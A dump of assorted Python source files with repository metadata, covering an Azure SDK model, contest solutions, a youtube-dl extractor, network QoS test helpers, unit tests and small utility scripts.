'resource_guid': {'key': 'properties.resourceGuid', 'type': 'str'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
}
def __init__(self, id=None, location=None, tags=None, virtual_machine=None, network_security_group=None, ip_configurations=None, dns_settings=None, mac_address=None, primary=None, enable_ip_forwarding=None, resource_guid=None, provisioning_state=None, etag=None):
super(NetworkInterface, self).__init__(id=id, location=location, tags=tags)
self.virtual_machine = virtual_machine
self.network_security_group = network_security_group
self.ip_configurations = ip_configurations
self.dns_settings = dns_settings
self.mac_address = mac_address
self.primary = primary
self.enable_ip_forwarding = enable_ip_forwarding
self.resource_guid = resource_guid
self.provisioning_state = provisioning_state
self.etag = etag
|
[
"lmazuel@microsoft.com"
] |
lmazuel@microsoft.com
|
cbc244e711bf6a4c305a2d03973ffb5ac09658b0
|
85a6fcace7eaff15242595bdf9b9e8f41116dc7f
|
/Round A/workout.py
|
7d0a0bd6e2ed76a2a224a03c3a89e1a9f3b430f1
|
[
"MIT"
] |
permissive
|
Meenadshi/GoogleKickStart-2020
|
e0dfd4f2e44a39c5c58de034265baf2fc7a81f9b
|
7c60b5a7a6c9daaf3f20b28d6b60aab19f5f22df
|
refs/heads/main
| 2023-08-15T23:41:31.484139
| 2021-10-17T00:34:58
| 2021-10-17T00:34:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 874
|
py
|
# Copyright (c) 2020 kamyu. All rights reserved.
#
# Google Kick Start 2020 Round A - Problem C. Workout
# https://codingcompetitions.withgoogle.com/kickstart/round/000000000019ffc7/00000000001d3f5b
#
# Time: O(Nlog(MAX_DIFF))
# Space: O(1)
#
def check(M, K, target):
count = 0
for i in xrange(1, len(M)):
count += ((M[i]-M[i-1])-1)//target # ceiling(diff/target)-1
if count > K:
return False
return True
def workout():
N, K = map(int, raw_input().strip().split())
M = map(int, raw_input().strip().split())
left, right = 1, max(M[i]-M[i-1] for i in xrange(1, len(M)))
while left <= right:
mid = left + (right-left)//2
if check(M, K, mid):
right = mid-1
else:
left = mid+1
return left
for case in xrange(input()):
print 'Case #%d: %s' % (case+1, workout())
|
[
"kamyu104@gmail.com"
] |
kamyu104@gmail.com
|
ab81b868a0040eb8cd4674fd20d3f934f5141499
|
981ecc9cf59dd6f839c3e40d26601efb1d073558
|
/src/face_recognition/youtube_dl/extractor/tf1.py
|
e595c4a69b3f03361abc05f6bca61adecb61cf36
|
[
"MIT"
] |
permissive
|
lodemo/CATANA
|
469e0684b816f09ac74f186552b463cc77db369e
|
a349f460772511ccbb16429b40bfb50f774d45d4
|
refs/heads/master
| 2023-03-30T04:07:12.070332
| 2021-02-03T21:47:32
| 2021-02-03T21:47:32
| 102,767,095
| 12
| 6
|
MIT
| 2023-03-24T21:55:24
| 2017-09-07T17:36:45
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,239
|
py
|
# coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
class TF1IE(InfoExtractor):
"""TF1 uses the wat.tv player."""
_VALID_URL = r'https?://(?:(?:videos|www|lci)\.tf1|(?:www\.)?(?:tfou|ushuaiatv|histoire|tvbreizh))\.fr/(?:[^/]+/)*(?P<id>[^/?#.]+)'
_TESTS = [{
'url': 'http://videos.tf1.fr/auto-moto/citroen-grand-c4-picasso-2013-presentation-officielle-8062060.html',
'info_dict': {
'id': '10635995',
'ext': 'mp4',
'title': 'Citroën Grand C4 Picasso 2013 : présentation officielle',
'description': 'Vidéo officielle du nouveau Citroën Grand C4 Picasso, lancé à l\'automne 2013.',
},
'params': {
# Sometimes wat serves the whole file with the --test option
'skip_download': True,
},
}, {
'url': 'http://www.tfou.fr/chuggington/videos/le-grand-mysterioso-chuggington-7085291-739.html',
'info_dict': {
'id': 'le-grand-mysterioso-chuggington-7085291-739',
'ext': 'mp4',
'title': 'Le grand Mystérioso - Chuggington',
'description': 'Le grand Mystérioso - Emery rêve qu\'un article lui soit consacré dans le journal.',
'upload_date': '20150103',
},
'params': {
# Sometimes wat serves the whole file with the --test option
'skip_download': True,
},
'skip': 'HTTP Error 410: Gone',
}, {
'url': 'http://www.tf1.fr/tf1/koh-lanta/videos/replay-koh-lanta-22-mai-2015.html',
'only_matching': True,
}, {
'url': 'http://lci.tf1.fr/sept-a-huit/videos/sept-a-huit-du-24-mai-2015-8611550.html',
'only_matching': True,
}, {
'url': 'http://www.tf1.fr/hd1/documentaire/videos/mylene-farmer-d-une-icone.html',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
wat_id = self._html_search_regex(
r'(["\'])(?:https?:)?//www\.wat\.tv/embedframe/.*?(?P<id>\d{8})\1',
webpage, 'wat id', group='id')
return self.url_result('wat:%s' % wat_id, 'Wat')
|
[
"moritzlode@gmail.com"
] |
moritzlode@gmail.com
|
256a78690243b47369486b84acba56ba650f403c
|
4131625553ff59b4c730ae7148dd5d603d8cb87d
|
/hackerEarth/challenges/iitKanpurFreshersProgrammingContest2016/pokeluck.py
|
30419fb90a7798a46de3e00cf2d4155fda419afc
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
odonnmi/learnNPractice
|
29034304303aab3827e6b3334b1d7d9d65b93e54
|
eb1c775e4d6e35cebb7b109b46b91f9aecb2d9ec
|
refs/heads/master
| 2020-12-04T14:52:00.520219
| 2019-09-03T06:30:03
| 2019-09-03T06:30:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,781
|
py
|
# Pokeluck
#######################################################################################################################
#
# Mewtwo is one of the rarest and most famous pokemons in the pokemon world. If any pokemon gets to fight with
# Mewtwo, he is considered to be "1-lucky". A pokemon that gets to fight with the pokemon who has fought with
# Mewtwo is considered to be "2-lucky", and so on.
#
# The Luckiness is defined on the basis of above mentioned rule. ( 1-Lucky -> Luckiness = 1).
#
# Note1: Consider luckiness of Mewtwo to be 0 .
#
# Note2: No one has negative luckiness.
#
# Note3: If a pokemon A is not Mewtwo himself, and has battled with someone with luckiness X, and has not battled
# with anyone with Luckiness smaller than X, then A has luckiness X+1 .
#
# Note4: It is ensured that every pokemon has finite positive luckiness.
#
# Input:
#
# The first line has two numbers: A,number of pokemons being considered and B, number of pokemon battles
# that have happened.
#
# Then B lines follow, each containing two distinct pokemons, denoting that the two pokemons have battled.
# Pokemons are represented by numbers between 1 and A.
#
# Mewtwo is represented by 1.
#
# Output Format:
#
# Output A-1 lines , ith line containing the luckiness of ith pokemon. (2 <= i <= A)
#
# Constraints:
#
# A <= 1000
#
# B <= (A(A-1))/2
#
#######################################################################################################################
# Input
#
# 3 2
# 1 2
# 2 3
#######################################################################################################################
# Output
#
# 1
# 2
#######################################################################################################################
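# One possible solution sketch: luckiness is the BFS distance from Mewtwo
# (pokemon 1), since each battle edge raises luckiness by exactly one.
from collections import deque

def solve():
    a, b = map(int, input().split())
    adj = [[] for _ in range(a + 1)]
    for _ in range(b):
        u, v = map(int, input().split())
        adj[u].append(v)
        adj[v].append(u)
    dist = [-1] * (a + 1)
    dist[1] = 0  # Mewtwo's luckiness is 0
    queue = deque([1])
    while queue:
        node = queue.popleft()
        for nxt in adj[node]:
            if dist[nxt] == -1:  # first visit yields the smallest luckiness
                dist[nxt] = dist[node] + 1
                queue.append(nxt)
    for i in range(2, a + 1):
        print(dist[i])

if __name__ == '__main__':
    solve()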
|
[
"sagarnikam123@gmail.com"
] |
sagarnikam123@gmail.com
|
e4d0583561a6158725a236905afe2fbba09c6263
|
d1ad901e1e926d9c92ce4dc7a7ba3c6ee91a65e2
|
/spytest/apis/qos/qos.py
|
c4158600f29cdeb92e9d1a8b3ac6ac00fa192bab
|
[
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
SubhajitPalKeysight/sonic-mgmt
|
ff59c2c5baf53cc2575aea2d541278fc9cf56977
|
e4b308a82572996b531cc09cbc6ba98b9bd283ea
|
refs/heads/master
| 2022-12-31T01:03:47.757864
| 2020-10-15T11:04:37
| 2020-10-15T11:04:37
| 286,815,154
| 1
| 1
|
NOASSERTION
| 2020-08-11T18:08:34
| 2020-08-11T18:08:33
| null |
UTF-8
|
Python
| false
| false
| 5,034
|
py
|
import re
from spytest.utils import filter_and_select
from spytest import st
import json
def verify_qos_queue_counters(dut,port,queue_name,param_list,val_list,tol_list):
'''
verifies QOS queue counters in the CLI show qos queue counters
:param dut: Device name where the command to be executed
:type dut: string
:param port: interface name to be checked
:type dut: string
:param queue_name: queue name to be checked
:type dut: string
:param param_list: list of params to be verified; example ['pkts_count', 'pkts_drop']
:param val_list: list of expected values for the params specified; example ['10000','5000']
:param tol_list: tolerence value for each param while comparing; for example ['1000', '500']
:return: True/False True - success case; False - Failure case
usage: verify_qos_queue_counters(dut1,'Ethernet0','UC0',['pkts_count', 'pkts_drop'],
['10000','5000'],['1000', '500'])
verify_qos_queue_counters(dut1,'Ethernet0','UC0',['pkts_count'],['10000'],['1000'])
    Created by: Julius <julius.mariyan@broadcom.com>
'''
success = True
cli_out = st.show(dut,'show queue counters {}'.format(port))
fil_out = filter_and_select(cli_out, param_list, {"port" : port, "txq" : queue_name})
if not fil_out:
st.error('port: {} and queue name: {} not found in output: {}'.format(port,queue_name,cli_out))
return False
else:
fil_out = fil_out[0]
for param,val,tol in zip(param_list,val_list,tol_list):
try:
fil_out[param] = re.sub(",","",fil_out[param])
int(fil_out[param])
except ValueError:
st.error('cannot get integer value from obtained string: {}'.format(fil_out[param]))
return False
        if int(val) - int(tol) <= int(fil_out[param]) <= int(val) + int(tol):
            st.log('obtained value: {} is in the range b/w {} and {} as expected for param: {} '
                   'in queue: {}'.format(int(fil_out[param]), int(val) - int(tol),
                                         int(val) + int(tol), param, queue_name))
        else:
            st.error('obtained value: {} is NOT in the range b/w {} and {} for param: {} '
                     'in queue: {}'.format(int(fil_out[param]), int(val) - int(tol),
                                           int(val) + int(tol), param, queue_name))
            success = False
    return success
def clear_qos_queue_counters(dut):
'''
:param dut: DUT name where CLI to be executed
:type dut: string
:return: True/False True - Success ; False - Failure
usage:
clear_qos_queue_counters(dut1)
    Created by: Julius <julius.mariyan@broadcom.com>
'''
return True if st.show(dut,'show queue counters --clear',skip_tmpl=True) else False
def bind_qos_map_port(dut, map_name, obj_name, interface):
'''
:param dut: device to be configured
:type dut: string
:param map_name: qos map name for example dscp_to_tc_map, tc_to_queue_map
:type map_name: string
:param obj_name: object name for example AZURE
:type obj_name: string
:param interface: interface to be associated for example Ethernet1
:type interface: string
:return: True/False True - Success ; False - Failure
usage:
bind_qos_map_port(dut1, "tc_to_queue_map", "Azure", "Ethernet0")
bind_qos_map_port(dut1, "dscp_to_tc_map", "Azure", "Ethernet2")
bind_qos_map_port(dut1, "tc_to_pg_map", "Azure", "Ethernet72")
    Created by: Julius <julius.mariyan@broadcom.com>
'''
final_data, temp_data = dict(), dict()
data = { map_name : "[" + map_name.upper() + "|" + obj_name + "]"}
temp_data[interface] = data
final_data['PORT_QOS_MAP'] = temp_data
data_json = json.dumps(final_data)
return st.apply_json(dut, data_json)
def clear_qos_config(dut):
'''
Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
    Clears all the QOS related config from the device
:param dut:
:return:
'''
command = "config qos clear"
st.config(dut, command)
def create_qos_json(dut, block_name, sub_block, dict_input):
'''
:param dut: device to be configured
:type dut: string
:param block_name: name of the field in json, for eg: dscp_to_tc_map, tc_to_queue_map, wred_profile etc
:type block_name: string
:param sub_block: sub field name, for eg: AZURE, AZURE_LOSSLESS etc
:type sub_block: string
:param dict_input: input values in dictionary
:type dict_input: string
:return: True/False True - Success ; False - Failure
usage:
create_qos_json(dut1, "tc_to_queue_map", "Azure", {"wred_green_enable" : "true"})
Created by: Julius <julius.mariyan@broadcom.com
'''
final_data, temp_data = dict(), dict()
temp_data[sub_block] = dict_input
final_data[block_name.upper()] = temp_data
final_data = json.dumps(final_data)
return st.apply_json(dut, final_data)
|
[
"noreply@github.com"
] |
SubhajitPalKeysight.noreply@github.com
|
6585fb31b416dfd35f83c956c594528d69b6d742
|
3fe5046326c0e6a63b9de6ab4de8f094f1e49614
|
/bin/indent-ged
|
165c4adbf540abe1e9a436dfd7f6e341711abfa8
|
[] |
no_license
|
dave-shawley/ged-work
|
cc7d6b71a58e3ac05d94177c018efe969fc60e0d
|
1edc7d6c2b871d65668a7ec347a42d3727e615d1
|
refs/heads/master
| 2020-03-23T22:01:52.407922
| 2019-04-21T14:33:06
| 2019-04-21T14:33:06
| 142,148,536
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 236
|
#!/usr/bin/env python
#
import sys
with open(sys.argv[1], 'r+') as f:
lines = f.readlines()
f.seek(0)
for line in lines:
indent, rest = line.split(None, 1)
f.write('\t' * int(indent))
f.write(line)
|
[
"daveshawley@gmail.com"
] |
daveshawley@gmail.com
|
|
cefb634734daaaddf09a98024d5ec5e44fb354b5
|
edb88981aa1420af7e074068ed7818b9d904a3dd
|
/tags/release-0.4.2/minds/test/test_cachefile.py
|
550d17ef92064fd5da222650ab9c462809cf2eb8
|
[] |
no_license
|
BackupTheBerlios/mindretrieve-svn
|
101c0f1dfc25d20d5f828b6fd0d43301b773af4e
|
463745fcf1c1d5b1f6c201c30bcc339c99b437ed
|
refs/heads/master
| 2021-01-22T13:57:31.225772
| 2006-04-28T04:24:43
| 2006-04-28T04:24:43
| 40,801,743
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,722
|
py
|
"""
"""
import os, os.path, sys
import unittest
from config_help import cfg
from minds import cachefile
class TestCacheFile(unittest.TestCase):
FILE1 = 'testcache'
def setUp(self):
self.pathname = os.path.join(cfg.getPath('logs'), self.FILE1)
self.cleanup()
def tearDown(self):
self.cleanup()
def cleanup(self):
# hardcode path to avoid deleting real data in config goof
try: os.remove('testlogs/' + self.FILE1 + '.mlog')
except OSError: pass
try: os.remove('testlogs/' + self.FILE1 + '.qlog')
except OSError: pass
def test_write(self):
c = cachefile.CacheFile(10)
c.write('hello')
self.assert_(not c.isOverflow())
c.write('how are you?')
self.assert_(c.isOverflow())
self.assert_(not os.path.exists(self.pathname+'.qlog'))
self.assert_(not os.path.exists(self.pathname+'.mlog'))
c.write_qlog(self.FILE1)
self.assert_(os.path.exists(self.pathname+'.qlog'))
        self.assertEqual(os.path.getsize(self.pathname+'.qlog'), 5)
c.write_mlog(self.FILE1)
self.assert_(os.path.exists(self.pathname+'.mlog'))
        self.assertEqual(os.path.getsize(self.pathname+'.mlog'), 5)
def test_discard(self):
c = cachefile.CacheFile(10)
c.write('hello')
self.assert_(not c.isOverflow())
c.write('how are you?')
self.assert_(c.isOverflow())
c.discard()
self.assert_(not os.path.exists(self.pathname+'.qlog'))
self.assert_(not os.path.exists(self.pathname+'.mlog'))
if __name__ == '__main__':
unittest.main()
|
[
"tungwaiyip@785ff9d5-dded-0310-b5f2-a5aff206d990"
] |
tungwaiyip@785ff9d5-dded-0310-b5f2-a5aff206d990
|
788e4f26f9ce4a49e8009089a81dd509608996ca
|
1c527a1944264784ba6ed237a723376bdee47f02
|
/src/utl/strip_csv.py
|
0c3dc9fa82235b03ec8b3ca868c5a6d64b12ed89
|
[] |
no_license
|
mikegleen/modes
|
3544517467b77ddb21ec50c2a624b98e0a7ea308
|
e77c89f28c623ce8fd30d7727a1b914461c6a0fd
|
refs/heads/master
| 2023-09-03T15:10:26.931110
| 2023-08-27T07:31:42
| 2023-08-27T07:31:42
| 139,562,349
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 499
|
py
|
"""
For each cell in a CSV file, strip leading and trailing whitespace.
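Usage (inferred from the argv handling below):
    python strip_csv.py input.csv output.csv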
"""
import codecs
import csv
import sys
def main():
incsv = codecs.open(sys.argv[1], 'r', 'utf-8-sig')
outcsv = codecs.open(sys.argv[2], 'w', 'utf-8-sig')
outwriter = csv.writer(outcsv)
for row in csv.reader(incsv):
for column in range(len(row)):
row[column] = row[column].strip() if row[column] else row[column]
outwriter.writerow(row)
if __name__ == '__main__':
main()
|
[
"mike.gleen@gmail.com"
] |
mike.gleen@gmail.com
|
08a13407b68ca6cda24394e7cdfc4eb4314bec1e
|
bc64931a5cdfed6d54a8d8828e9b9d4510d7a998
|
/test/multisig/commands/create_multisig_address_test.py
|
83ae9dbd6d76cdcf5210d0bea2085f4dc26f7cac
|
[
"MIT"
] |
permissive
|
valentinlehuger/iota.lib.py
|
4b9ddfda9c283b4fde6d9ba6ab5d6c1add5cd920
|
e345de981829a36ceaccf3862835c0dd28486950
|
refs/heads/master
| 2021-01-19T12:26:09.709236
| 2017-07-16T01:19:39
| 2017-07-16T01:19:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,866
|
py
|
# coding=utf-8
from __future__ import absolute_import, division, print_function, \
unicode_literals
from unittest import TestCase
import filters as f
from filters.test import BaseFilterTestCase
from iota import TryteString
from iota.adapter import MockAdapter
from iota.crypto.types import Digest
from iota.filters import Trytes
from iota.multisig import MultisigIota
from iota.multisig.commands import CreateMultisigAddressCommand
from iota.multisig.types import MultisigAddress
from six import binary_type, text_type
class CreateMultisigAddressCommandTestCase(TestCase):
# noinspection SpellCheckingInspection
def setUp(self):
super(CreateMultisigAddressCommandTestCase, self).setUp()
self.adapter = MockAdapter()
self.command = CreateMultisigAddressCommand(self.adapter)
# Define some tryte sequences that we can reuse between tests.
self.digest_1 =\
Digest(
trytes =
b'FWNEPVJNGUKTSHSBDO9AORBCVWWLVXC9KAMKYYNKPYNJDKSAUURI9ELKOEEYPKVTYP'
b'CKOCJQESYFEMINIFKX9PDDGRBEEHYYXCJW9LHGWFZGHKCPVDBGMGQKIPCNKNITGMZT'
b'DIWVUB9PCHCOPHMIWKSUKRHZOJPMAY',
key_index = 0,
)
self.digest_2 =\
Digest(
trytes =
b'PAIRLDJQY9XAUSKIGCTHRJHZVARBEY9NNHYJ9UI9HWWZXFSDWEZEGDCWNVVYSYDV9O'
b'HTR9NGGZURISWTNECFTCMEWQQFJ9VKLFPDTYJYXC99OLGRH9OSFJLMEOGHFDHZYEAF'
b'IMIZTJRBQUVCR9U9ZWTMUXTUEOUBLC',
key_index = 0,
)
def test_wireup(self):
"""
Verify that the command is wired up correctly.
"""
self.assertIsInstance(
MultisigIota(self.adapter).createMultisigAddress,
CreateMultisigAddressCommand,
)
def test_happy_path(self):
"""
Generating a multisig address.
"""
result = self.command(digests=[self.digest_1, self.digest_2])
# noinspection SpellCheckingInspection
self.assertDictEqual(
result,
{
'address':
MultisigAddress(
trytes =
b'JUIFYSUQFVBFGNHOJMLWBHMGASFGBPAUMRZRRCJF'
b'CCOJHJKZVUOCEYSCLXAGDABCEWSUXCILJCGQWI9SF',
digests = [self.digest_1, self.digest_2],
),
},
)
class CreateMultisigAddressRequestFilterTestCase(BaseFilterTestCase):
filter_type = CreateMultisigAddressCommand(MockAdapter()).get_request_filter
skip_value_check = True
# noinspection SpellCheckingInspection
def setUp(self):
super(CreateMultisigAddressRequestFilterTestCase, self).setUp()
# Define some tryte sequences that we can reuse between tests.
self.digest_1 =\
Digest(
trytes =
b'FWNEPVJNGUKTSHSBDO9AORBCVWWLVXC9KAMKYYNKPYNJDKSAUURI9ELKOEEYPKVTYP'
b'CKOCJQESYFEMINIFKX9PDDGRBEEHYYXCJW9LHGWFZGHKCPVDBGMGQKIPCNKNITGMZT'
b'DIWVUB9PCHCOPHMIWKSUKRHZOJPMAY',
key_index = 0,
)
self.digest_2 =\
Digest(
trytes =
b'PAIRLDJQY9XAUSKIGCTHRJHZVARBEY9NNHYJ9UI9HWWZXFSDWEZEGDCWNVVYSYDV9O'
b'HTR9NGGZURISWTNECFTCMEWQQFJ9VKLFPDTYJYXC99OLGRH9OSFJLMEOGHFDHZYEAF'
b'IMIZTJRBQUVCR9U9ZWTMUXTUEOUBLC',
key_index = 0,
)
def test_pass_happy_path(self):
"""
Request is valid.
"""
request = {
'digests': [self.digest_1, self.digest_2],
}
filter_ = self._filter(request)
self.assertFilterPasses(filter_)
self.assertDictEqual(filter_.cleaned_data, request)
def test_pass_compatible_types(self):
"""
Request contains values that can be converted to the expected
types.
"""
filter_ = self._filter({
# ``digests`` may contain any values that can be converted into
# :py:class:`Digest` objects.
'digests': [binary_type(self.digest_1), TryteString(self.digest_2)],
})
self.assertFilterPasses(filter_)
self.assertDictEqual(
filter_.cleaned_data,
{
'digests': [self.digest_1, self.digest_2],
},
)
def test_fail_empty(self):
"""
Request is empty.
"""
self.assertFilterErrors(
{},
{
'digests': [f.FilterMapper.CODE_MISSING_KEY],
},
)
def test_fail_unexpected_parameters(self):
"""
Request contains unexpected parameters.
"""
self.assertFilterErrors(
{
'digests': [self.digest_1, self.digest_2],
# Oh, and I suppose that's completely inconspicuous.
'foo': 'bar',
},
{
'foo': [f.FilterMapper.CODE_EXTRA_KEY],
},
)
def test_fail_digests_null(self):
"""
``digests`` is null.
"""
self.assertFilterErrors(
{
'digests': None,
},
{
'digests': [f.Required.CODE_EMPTY],
},
)
def test_fail_digests_wrong_type(self):
"""
``digests`` is not an array.
"""
self.assertFilterErrors(
{
'digests': self.digest_1,
},
{
'digests': [f.Array.CODE_WRONG_TYPE],
},
)
def test_fail_digests_empty(self):
"""
``digests`` is an array, but it's empty.
"""
self.assertFilterErrors(
{
'digests': [],
},
{
'digests': [f.Required.CODE_EMPTY],
},
)
def test_fail_digests_contents_invalid(self):
"""
``digests`` is an array, but it contains invalid values.
"""
self.assertFilterErrors(
{
'digests': [
b'',
True,
None,
b'not valid trytes',
# This is actually valid; I just added it to make sure the
# filter isn't cheating!
TryteString(self.digest_1),
2130706433,
],
},
{
'digests.0': [f.Required.CODE_EMPTY],
'digests.1': [f.Type.CODE_WRONG_TYPE],
'digests.2': [f.Required.CODE_EMPTY],
'digests.3': [Trytes.CODE_NOT_TRYTES],
'digests.5': [f.Type.CODE_WRONG_TYPE],
},
)
|
[
"phx@phx.ph"
] |
phx@phx.ph
|
eb7ae1ac126c5b743c4c5ef5c4ccf26c00e3fe0b
|
6468584be4f1400ca18dabe59a5c0f05e1f45b03
|
/dsl/features/create_ngram_matrix.py
|
6e9dd4263e7604fd6bf0246dd03e788605d20f6d
|
[
"MIT"
] |
permissive
|
juditacs/dsl
|
824e04e77d7bf44aab7e0b820b3f36fea9f09e87
|
d6212cb2ff0755ceed8f37ee2f80ab47c9dc780c
|
refs/heads/master
| 2021-01-14T13:21:52.215072
| 2020-04-16T09:32:02
| 2020-04-16T09:32:02
| 35,669,552
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,825
|
py
|
from sys import argv, stderr
import cPickle
from featurize import Tokenizer, Featurizer
from dsl.representation.model import Representation
def main():
N = int(argv[1]) if len(argv) > 1 else 3
t = Tokenizer(filter_punct=True, ws_norm=True, strip=True, replace_digits=True)
f = Featurizer(t, N=N)
f.featurize_in_directory(argv[2])
stderr.write('Featurized\n')
#m = f.to_dok_matrix(docs)
f.get_correlations()
stderr.write('Means computed\n')
f.label_feat_pearson()
stderr.write('Correlations computed\n')
cut = int(argv[4]) if len(argv) > 4 else 40
f.filter_top_ngrams(cut)
stderr.write('Top ngrams filtered\n')
f.save_features('train_features')
mtx = f.to_dok_matrix()
with open('train_mtx.cPickle', 'wb') as fh:
cPickle.dump((f.labels.l, mtx), fh, -1)
stderr.write('Data read\n')
stderr.write('Trained\n')
test_f = Featurizer(t, N=N)
test_f.featdict = f.featdict
test_f.featdict.freeze_dict()
test_f.featurize_in_directory(argv[3])
docs = test_f.filter_ngrams(test_f.docs, f.topngrams)
test_f.docs = docs
test_f.topngrams = f.topngrams
test_f.save_features('test_features')
test_f.featdict.save('topfeatures')
test_mtx = test_f.to_dok_matrix()
with open('test_mtx.cPickle', 'wb') as fh:
cPickle.dump((test_f.labels.l, test_mtx), fh, -1)
acc = 0
stderr.write('Test matrix done\n')
r = Representation('dummy', 'svm', svm_ktype='svc')
r.encode(mtx)
stderr.write('Encoded\n')
r.train_classifier(f.labels.l)
for i in xrange(test_mtx.shape[0]):
gold = test_f.labels.l[i]
cl = r.classify_vector(test_mtx.getrow(i).todense())[0]
if gold == cl:
acc += 1
print float(acc) / test_mtx.shape[0]
if __name__ == '__main__':
main()
|
[
"judit@sch.bme.hu"
] |
judit@sch.bme.hu
|
4f31d3739a8a0169184bb538944118b6f95aec4a
|
fd4df5cf34f8427153bf01d25c39ded9315b8d6a
|
/tests/test_ram.py
|
7a12aff7cec9d97af7a57edbc2623b3b2f0b1518
|
[
"BSD-2-Clause"
] |
permissive
|
jepebe/nes
|
9ac00e89cf474b7811020d18bf7fd8f15b556339
|
79e6ad689473b7a3a4f3b6d7cf2c381220fcf140
|
refs/heads/master
| 2023-01-05T22:38:30.714836
| 2020-10-26T07:33:10
| 2020-10-26T07:33:10
| 300,615,959
| 1
| 1
| null | 2020-10-26T07:33:11
| 2020-10-02T13:01:36
|
Python
|
UTF-8
|
Python
| false
| false
| 567
|
py
|
from nes.bus import Bus
class TestCartridge:
    def cpu_write(self, addr, value):
return None
def cpu_read(self, addr):
return None
def test_ram():
bus = Bus()
bus.insert_cartridge(TestCartridge())
for addr in range(0x0000, 0x800):
bus.cpu_write(addr, 0xff)
assert bus.cpu_read(addr) == 0xff
    # The 2KB of RAM is mirrored every 0x800 bytes, so one write should be
    # visible at all four mirrored addresses.
    bus.cpu_write(0x700, 0x7f)
assert bus.cpu_read(0x700) == 0x7f
assert bus.cpu_read(0x700 + 0x800) == 0x7f
assert bus.cpu_read(0x700 + 0x800 * 2) == 0x7f
assert bus.cpu_read(0x700 + 0x800 * 3) == 0x7f
|
[
"jepebe@users.noreply.github.com"
] |
jepebe@users.noreply.github.com
|
af1f62d0bf863e6597fbe007f00340142d4450ce
|
16b2c2365eff11f34ae260321e6dde78ab09b45d
|
/api/api_services/PersonService.py
|
14c5f4056460582f3abd2dd4a7f5dc56475455ed
|
[] |
no_license
|
laken11/TMS
|
bf941802e350a16db0f2314330ad315e73ce48f0
|
c271f2cbb1624ab943c10bacaa6406ec8ca08083
|
refs/heads/dev
| 2023-04-27T22:03:38.811267
| 2021-05-08T12:06:54
| 2021-05-08T12:06:54
| 362,518,465
| 0
| 0
| null | 2021-05-05T10:07:54
| 2021-04-28T15:27:28
|
Python
|
UTF-8
|
Python
| false
| false
| 1,823
|
py
|
from abc import ABCMeta, abstractmethod
from typing import List
from api.api_dto.PersonDto import *
from api.api_repository.PersonRepository import PersonRepository
class PersonManagementService(metaclass=ABCMeta):
@abstractmethod
def create_person(self, model: CreatePersonDto):
"""Create a person object"""
raise NotImplementedError
@abstractmethod
def update_person(self, person_id, model: UpdatePersonDto):
"""Update a person object"""
raise NotImplementedError
@abstractmethod
def list_person(self) -> List[ListPersonDto]:
"""List all person objects"""
raise NotImplementedError
@abstractmethod
def person_details(self, person_id, model: PersonDetailsDto):
"""Details of a person object"""
raise NotImplementedError
@abstractmethod
def update_person_role(self, person_id, model: UpdatePersonRoleDto):
"""Updating a person role"""
raise NotImplementedError
class DefaultPersonManagementService(PersonManagementService):
repository: PersonRepository
def __init__(self, repository: PersonRepository):
self.repository = repository
def create_person(self, model: CreatePersonDto):
return self.repository.create_person(model=model)
    def update_person(self, person_id, model: UpdatePersonDto):
        return self.repository.update_person(person_id=person_id, model=model)
def list_person(self) -> List[ListPersonDto]:
return self.repository.list_person()
def person_details(self, person_id, model: PersonDetailsDto):
return self.repository.person_details(person_id=person_id, model=model)
def update_person_role(self, person_id, model: UpdatePersonRoleDto):
return self.repository.update_person_role(person_id=person_id, model=model)
|
[
"omitogunopeyemi@gmail.com"
] |
omitogunopeyemi@gmail.com
|
7fc48ac64107c97a8357f111ccd641bcaaf880af
|
aca01c2d073cc9ca2b71e12b8ed87a13a3d61438
|
/design-patterns/src/iterators-ksiazka-adresowa.py
|
bed9ad1fa41d7eb0c99cdd60435c1395e01f065b
|
[
"MIT"
] |
permissive
|
sli1989/book-python
|
ee2ee0f37b3173b6921db722a4cb2593d6df1f2b
|
51ea279bcc26c4b9b8a1d726e2683c019a28d62b
|
refs/heads/master
| 2020-04-15T11:39:07.209256
| 2019-01-06T23:27:55
| 2019-01-06T23:27:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 792
|
py
|
class Kontakt:
    def __init__(self, imie, nazwisko, adresy=()):
        self.imie = imie
        self.nazwisko = nazwisko
        self.adresy = list(adresy)
    def __iter__(self):
        # Iterating over a contact yields its addresses.
        return iter(self.adresy)
class Adres:
    def __init__(self, **kwargs):
        for key, value in kwargs.items():
            setattr(self, key, value)
    def __str__(self):
        return str(self.__dict__)
kontakt = Kontakt(imie='Pan', nazwisko='Twardowski', adresy=[
Adres(ulica='2101 E NASA Pkwy', miasto='Houston', stan='Texas',
kod='77058', panstwo='USA'),
Adres(ulica=None, miasto='Kennedy Space Center', kod='32899',
panstwo='USA'),
Adres(ulica='4800 Oak Grove Dr', miasto='Pasadena', kod='91109',
panstwo='USA'),
Adres(ulica='2825 E Ave P', miasto='Palmdale', stan='California',
kod='93550', panstwo='USA'),
])
for adres in kontakt:
print(adres)
|
[
"matt@astrotech.io"
] |
matt@astrotech.io
|
d8074cdceef3099fac3b9fe5188dce7732392b2d
|
c8efab9c9f5cc7d6a16d319f839e14b6e5d40c34
|
/source/Clarification/Backtracking/生成括号.py
|
79c4cbc77e31405a0b2e94b1f993c9dc312741f0
|
[
"MIT"
] |
permissive
|
zhangwang0537/LeetCode-Notebook
|
73e4a4f2c90738dea4a8b77883b6f2c59e02e9c1
|
1dbd18114ed688ddeaa3ee83181d373dcc1429e5
|
refs/heads/master
| 2022-11-13T21:08:20.343562
| 2020-04-09T03:11:51
